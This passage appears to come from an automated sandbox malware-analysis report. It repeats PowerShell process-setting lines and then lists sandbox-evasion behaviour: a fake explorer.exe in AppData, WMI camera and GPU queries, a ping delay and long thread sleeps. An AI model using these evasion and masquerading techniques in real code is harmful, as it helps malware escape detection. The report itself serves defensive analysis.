                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeMemory allocated: 1490000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeMemory allocated: 1AE60000 memory reserve | memory write watch
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeMemory allocated: FC0000 memory reserve | memory write watch
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeMemory allocated: 1AA00000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 600000
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 599766
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 599579
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 599422
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 599289
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 599157
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 599008
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 598823
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 598610
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 598453
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 3600000
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 598012
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 597641
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 300000
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 597422
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 597277
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 597000
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 596844
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 596704
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 596547
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 596384
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 596219
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 596037
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 595860
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 595655
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 595527
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 595396
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 595235
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 594922
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 594645
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 594513
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 594389
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 594281
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 594125
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 593919
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 593790
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 593671
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 593562
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 593453
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 593336
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 593208
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 593066
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 592929
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 592815
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 592701
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 592594
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 592466
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 592359
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 592204
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 592047
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 591923
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 591812
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 591688
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 591563
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 591453
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 591344
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 591222
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 591094
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 590979
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 590874
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 590750
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 590579
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 590468
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 590358
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 590215
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 590006
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 589750
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 589488
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 589344
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 589233
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 589104
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 588948
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 588829
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 588718
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 588610
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 588485
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 588360
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 588235
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 588100
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 587978
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 587875
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 587755
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 587641
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 587532
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 587307
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 586768
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 586547
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 586438
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Thread delayed: delay time: 586313
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8142
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7688
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 594
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8287
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8133
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8341
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8195
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 639
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8016
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7682
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 408
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7805
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7676
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 398
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8022
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7405
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Window / User API: threadDelayed 6737
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Window / User API: threadDelayed 2769
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1091
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 660
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 870
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1008
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1228
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 989
